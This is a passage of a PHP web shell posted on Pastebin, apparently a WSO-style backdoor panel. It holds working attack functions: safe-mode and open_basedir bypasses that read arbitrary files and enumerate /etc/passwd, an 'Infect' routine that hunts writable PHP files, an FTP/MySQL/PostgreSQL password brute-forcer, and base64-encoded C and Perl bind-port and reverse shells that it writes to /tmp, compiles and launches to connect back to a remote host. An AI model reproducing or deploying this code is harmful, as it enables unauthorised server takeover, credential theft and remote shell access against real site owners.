  1059.         <form method='post' target='_blank' name='hf'>
  1060.             <input type='text' name='hash' style='width:200px;'><br>
  1061.            <input type='hidden' name='act' value='find'/>
  1062.             <input type='submit' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
  1063.             <input type='submit' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
  1064.            <input type='submit' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
  1065.             <input type='submit' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
  1066.             <input type='submit' value='toolki.com' onclick=\"document.hf.action='http://toolki.com/';document.hf.submit()\"><br>
  1067.             <input type='submit' value='fopo.com.ar' onclick=\"document.hf.action='http://fopo.com.ar/';document.hf.submit()\"><br>
  1068.             <input type='submit' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
  1069.         </form></div>";
  1070.     hardFooter();
  1071. }
  1072. function actionSafeMode() {
  1073.     $temp='';
  1074.     ob_start();
  1075.     switch($_POST['p1']) {
  1076.         case 1:
  1077.             $temp=@tempnam($test, 'cx');
  1078.             if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  1079.                 echo @file_get_contents($temp);
  1080.                 unlink($temp);
  1081.             } else
  1082.                 echo 'Sorry... Can\'t open file';
  1083.             break;
  1084.         case 2:
  1085.             $files = glob($_POST['p2'].'*');
  1086.             if( is_array($files) )
  1087.                 foreach ($files as $filename)
  1088.                     echo $filename."\n";
  1089.             break;
  1090.         case 3:
  1091.             $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  1092.             curl_exec($ch);
  1093.             break;
  1094.         case 4:
  1095.             ini_restore("safe_mode");
  1096.             ini_restore("open_basedir");
  1097.             include($_POST['p2']);
  1098.             break;
  1099.         case 5:
  1100.             for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  1101.                 $uid = @posix_getpwuid($_POST['p2']);
  1102.                 if ($uid)
  1103.                     echo join(':',$uid)."\n";
  1104.             }
  1105.             break;
  1106.         case 6:
  1107.             if(!function_exists('imap_open'))break;
  1108.             $stream = imap_open($_POST['p2'], "", "");
  1109.             if ($stream == FALSE)
  1110.                 break;
  1111.             echo imap_body($stream, 1);
  1112.             imap_close($stream);
  1113.             break;
  1114.     }
  1115.     $temp = ob_get_clean();
  1116.     hardHeader();
  1117.     echo '<h1>Safe mode bypass</h1><div class=content>';
  1118.     echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
  1119.     if($temp)
  1120.         echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  1121.     echo '</div>';
  1122.     hardFooter();
  1123. }
  1124. function actionLogout() {
  1125.     setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
  1126.     die('bye!');
  1127. }
  1128. function actionSelfRemove() {
  1129.     if($_POST['p1'] == 'yes')
  1130.         if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  1131.             die('Shell has been removed');
  1132.         else
  1133.             echo 'unlink error!';
  1134.     if($_POST['p1'] != 'yes')
  1135.         hardHeader();
  1136.     echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1137.     hardFooter();
  1138. }
  1139. function actionInfect() {
  1140.     hardHeader();
  1141.     echo '<h1>Infect</h1><div class=content>';
  1142.     if($_POST['p1'] == 'infect') {
  1143.         $target=$_SERVER['DOCUMENT_ROOT'];
  1144.             function ListFiles($dir) {
  1145.                 if($dh = opendir($dir)) {
  1146.                     $files = Array();
  1147.                     $inner_files = Array();
  1148.                     while($file = readdir($dh)) {
  1149.                         if($file != "." && $file != "..") {
  1150.                             if(is_dir($dir . "/" . $file)) {
  1151.                                 $inner_files = ListFiles($dir . "/" . $file);
  1152.                                 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1153.                             } else {
  1154.                                 array_push($files, $dir . "/" . $file);
  1155.                             }
  1156.                         }
  1157.                     }
  1158.                     closedir($dh);
  1159.                     return $files;
  1160.                 }
  1161.             }
  1162.             foreach (ListFiles($target) as $key=>$file){
  1163.                 $nFile = substr($file, -4, 4);
  1164.                 if($nFile == ".php" ){
  1165.                     if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
  1166.                         echo "$file<br>";
  1167.                         $i++;
  1168.                     }
  1169.                 }
  1170.             }
  1171.             echo "<font color=red size=14>$i</font>";
  1172.         }else{
  1173.             echo "<form method=post><input type=submit value=Infect name=infet></form>";
  1174.             echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
  1175.         }
  1176.     hardFooter();
  1177. }
  1178. function actionBruteforce() {
  1179.     hardHeader();
  1180.     if( isset($_POST['proto']) ) {
  1181.         echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  1182.         if( $_POST['proto'] == 'ftp' ) {
  1183.             function bruteForce($ip,$port,$login,$pass) {
  1184.                 $fp = @ftp_connect($ip, $port?$port:21);
  1185.                 if(!$fp) return false;
  1186.                 $res = @ftp_login($fp, $login, $pass);
  1187.                 @ftp_close($fp);
  1188.                 return $res;
  1189.             }
  1190.         } elseif( $_POST['proto'] == 'mysql' ) {
  1191.             function bruteForce($ip,$port,$login,$pass) {
  1192.                 $res = @mysqli_connect($ip.':'.($port?$port:3306), $login, $pass);
  1193.                 @mysqli_close($res);
  1194.                 return $res;
  1195.             }
  1196.         } elseif( $_POST['proto'] == 'pgsql' ) {
  1197.             function bruteForce($ip,$port,$login,$pass) {
  1198.                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
  1199.                 $res = @pg_connect($str);
  1200.                 @pg_close($res);
  1201.                 return $res;
  1202.             }
  1203.         }
  1204.         $success = 0;
  1205.         $attempts = 0;
  1206.         $server = explode(":", $_POST['server']);
  1207.         if($_POST['type'] == 1) {
  1208.             $temp = @file('/etc/passwd');
  1209.             if( is_array($temp) )
  1210.                 foreach($temp as $line) {
  1211.                     $line = explode(":", $line);
  1212.                     ++$attempts;
  1213.                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  1214.                         $success++;
  1215.                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  1216.                     }
  1217.                     if(@$_POST['reverse']) {
  1218.                         $tmp = "";
  1219.                         for($i=strlen($line[0])-1; $i>=0; --$i)
  1220.                             $tmp .= $line[0][$i];
  1221.                         ++$attempts;
  1222.                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  1223.                             $success++;
  1224.                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  1225.                         }
  1226.                     }
  1227.                 }
  1228.         } elseif($_POST['type'] == 2) {
  1229.             $temp = @file($_POST['dict']);
  1230.             if( is_array($temp) )
  1231.                 foreach($temp as $line) {
  1232.                     $line = trim($line);
  1233.                     ++$attempts;
  1234.                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  1235.                         $success++;
  1236.                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  1237.                     }
  1238.                 }
  1239.         }
  1240.         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  1241.     }
  1242.     echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  1243.         .'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>'
  1244.         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  1245.         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  1246.         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  1247.         .'<input type=hidden name=ne  value="">'
  1248.         .'<span>Server:port</span></td>'
  1249.         .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  1250.         .'<tr><td><span>Brute type</span></td>'
  1251.         .'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>'
  1252.         .'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>'
  1253.         .'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>'
  1254.         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  1255.         .'<td><input type=text name=login value="root"></td></tr>'
  1256.         .'<tr><td><span>Dictionary</span></td>'
  1257.         .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  1258.         .'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
  1259.     echo '</div>';
  1260.     hardFooter();
  1261. }
  1262. /* (С) 01.2020 Jakub Vrána */
  1263. function actionSql() {
  1264.     hardHeader();
  1265.    
  1266.     $adminer_url = 'adminer.php';
  1267.     $adminer_functions = 'functions.js';
  1268.     $adminer_editing = 'editing.js';
  1269.  
  1270.     echo"<script>window.onload=function() {document.getElementById('ifr').style.height=window.innerHeight+'px';}
  1271.     </script>";
  1272.     if (file_exists($adminer_functions)) {
  1273.         if (file_exists($adminer_editing)) {
  1274.         } else {
  1275.             echo "<h1>Results</h1><div class=content><div><span>Warning: </span>" .$GLOBALS['home_cwd']. "/$adminer_editing file does not exist </div></div>";
  1276.         }
  1277.     } else {
  1278.         if (file_exists($adminer_editing)) {
  1279.             echo "<h1>Results</h1><div class=content><div><span>Warning: </span>" .$GLOBALS['home_cwd']. "/$adminer_functions file does not exist </div></div>";
  1280.         } else {
  1281.             echo "<h1>Results</h1><div class=content><div><span>Warning: </span>" .$GLOBALS['home_cwd']. "/$adminer_functions and ".$GLOBALS['home_cwd']. "/$adminer_editing  files does not exist </div></div>";
  1282.         }
  1283.     }
  1284.    
  1285.     if (file_exists($adminer_url)) {
  1286.         echo "<h1>Sql browser</h1><div class=content><iframe id='ifr' src='$adminer_url' width=100% height=auto scrolling=auto frameborder=0 style='border:none !important;'></iframe></div>";
  1287.     } else {
  1288.         echo "<h1>Not found</h1><div class=content><div align='center' ><h5>" .$GLOBALS['home_cwd']. "/$adminer_url</h5> file does not exist</div></div>";
  1289.         hardFooter();
  1290.     };
  1291. }
  1292. /* (С) 02.2019 Abdul Ahad */
  1293. function actionNetwork() {
  1294.     hardHeader();
  1295.     $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  1296.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1297.     $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
  1298.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1299.     echo "<h1>Network tools</h1><div class=content>
  1300.     <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
  1301.     <span>Bind port to /bin/sh</span><br/>
  1302.     Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
  1303.     </form>
  1304.     <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
  1305.     <span>Back-connect to</span><br/>
  1306.     Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
  1307.     </form><br>";
  1308.     if(isset($_POST['p1'])) {
  1309.         function cf($f,$t) {
  1310.             $w=@fopen($f,"w") or @function_exists('file_put_contents');
  1311.             if($w)  {
  1312.                 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  1313.                 @fclose($w);
  1314.             }
  1315.         }
  1316.         if($_POST['p1'] == 'bpc') {
  1317.             cf("/tmp/bp.c",$bind_port_c);
  1318.             $apple = ex("gcc -o /tmp/bp /tmp/bp.c");
  1319.             @unlink("/tmp/bp.c");
  1320.             $apple .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  1321.             echo "<pre class=ml1>$apple".ex("ps aux | grep bp")."</pre>";
  1322.         }
  1323.         if($_POST['p1'] == 'bpp') {
  1324.             cf("/tmp/bp.pl",$bind_port_p);
  1325.             $apple = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  1326.             echo "<pre class=ml1>$apple".ex("ps aux | grep bp.pl")."</pre>";
  1327.         }
  1328.         if($_POST['p1'] == 'bcc') {
  1329.             cf("/tmp/bc.c",$back_connect_c);
  1330.             $apple = ex("gcc -o /tmp/bc /tmp/bc.c");
  1331.             @unlink("/tmp/bc.c");
  1332.             $apple .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  1333.             echo "<pre class=ml1>$apple".ex("ps aux | grep bc")."</pre>";
  1334.         }
  1335.         if($_POST['p1'] == 'bcp') {
  1336.             cf("/tmp/bc.pl",$back_connect_p);
  1337.             $apple = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  1338.             echo "<pre class=ml1>$apple".ex("ps aux | grep bc.pl")."</pre>";
  1339.         }
  1340.     }
  1341.     echo '</div>';
  1342.     hardFooter();
  1343. }
  1344. if( empty($_POST['a']) )
  1345.     if(isset($_action) && function_exists('action' . $_action))
  1346.         $_POST['a'] = $_action;
  1347.     else
  1348.         $_POST['a'] = 'FilesMan';
  1349. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  1350.     call_user_func('action' . $_POST['a']);
  1351. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!